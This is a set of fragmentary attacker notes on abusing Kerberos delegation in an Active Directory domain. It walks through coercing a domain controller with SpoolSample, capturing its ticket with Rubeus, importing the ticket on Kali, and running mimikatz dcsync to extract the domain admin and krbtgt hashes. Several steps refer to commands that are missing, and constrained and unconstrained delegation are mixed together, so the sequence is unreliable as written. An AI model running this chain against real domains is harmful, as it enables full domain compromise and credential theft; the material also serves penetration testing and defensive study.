ls \\<target machine>\c$
# to list file in the target machine with imported ticket.
Unconstrained Delegation
User --- authenticates to ---> IIS server ---> authenticates on behalf of the user ---> DB server
Any user authentication (i.e CIFS) to the computer with unconstrained delegation enabled on it, will cache that user's TGT in memory, which can later be dumped and reused by an adversary.
example: IIS01 allows to contrained delegation to FILE_01
User has to have an attribute TRUSTED_TO_AUTH_FOR_DELEGATION in order for it to be able to authenticate to the remote service.
TRUSTED_TO_AUTH_FOR_DELEGATION - (Windows 2000/Windows Server 2003) The account is enabled for delegation. This is a security-sensitive setting. Accounts that have this option enabled should be tightly controlled. This setting lets a service that runs under the account assume a client's identity and authenticate as that user to other remote servers on the network.
dc01 - domain controller running a print service (victim, target)
check with this
Before attack (administrator cmd in breached computer ws01 )
Then run SpoolSample.exe (cmd.exe) in IIS01
Rubeus could also import the TGT directly to memory:
We indeed got a TGT for DC01$ computer!
With this, we can make our compromised system ws01$ appear like a Domain Controller and extract an NTLM hash for the user offense\spotless which we know has high privileges in the domain:
# Import Ticket to Kali Linux
# make sure the base64 file is one line.
base64 -d ticket.kirbi.b64 > ticket.kirbi
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=/home/kali/ticket.ccache
# in this case spotless is domain admin user.
mimikatz # lsadump::dcsync /domain:offense.local /user:spotless
mimikatz # lsadump::dcsync /domain:offense.local /user:krbtgt